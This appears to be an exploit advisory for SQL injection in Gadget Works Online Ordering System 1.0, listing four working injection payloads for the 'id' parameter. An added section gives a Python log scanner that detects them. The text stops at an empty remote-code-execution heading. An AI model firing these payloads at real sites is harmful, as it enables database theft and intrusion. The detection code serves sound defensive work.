Authored by Richard Jones

Gadget Works Online Ordering System version 1.0 remote SQL injection to remote code execution exploit.

# Exploit Title: Gadget Works Online Ordering System - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage:
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

SQL Injection details:

*replace IP with the website IP


Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -
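
For defenders, an added example (not part of the original advisory or the vendor's code): a log scanner that flags `q=single-item` requests whose `id` is not a plain integer and labels which of the four techniques above it resembles. The access-log format, the `/app/index.php` path, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the advisory); the path is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /app/index.php?q=single-item&id=7 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /app/index.php?q=single-item&id=(SELECT%20(CASE%20WHEN%20(5628=5628)%20THEN%201%20ELSE%20(SELECT%209686%20UNION%20SELECT%208857)%20END)) HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /app/index.php?q=single-item&id=1%20OR%20(SELECT%203320%20FROM(SELECT%20COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /app/index.php?q=single-item&id=1%20AND%20(SELECT%202585%20FROM%20(SELECT(SLEEP(5)))BrmF) HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:10 +0000] "GET /app/index.php?q=single-item&id=1%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 5301
203.0.113.9 - - [01/Jan/2024:10:00:11 +0000] "GET /app/index.php?q=single-item&id=7%27 HTTP/1.1" 200 790
"""

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Checked in order: the boolean payload embeds UNION SELECT, so it must precede "UNION query".
SIGNATURES = [
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\bcase\s+when\b", re.I)),
    ("UNION query", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
]

def classify_id(value):
    """Return None for a plain decimal id, else a label for the suspicious value."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-integer id"

def scan(log_text):
    # Returns (line number, label) for every single-item request with a bad id.
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        if "single-item" not in params.get("q", []):
            continue
        for value in params.get("id", []):
            label = classify_id(value)
            if label:
                findings.append((lineno, label))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Log review of this kind is a backstop; on the application side the fix is to cast `id` to an integer or bind it in a prepared statement.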

SQL Injection to RCE

*replace IP with the website's IP


RCE execution point: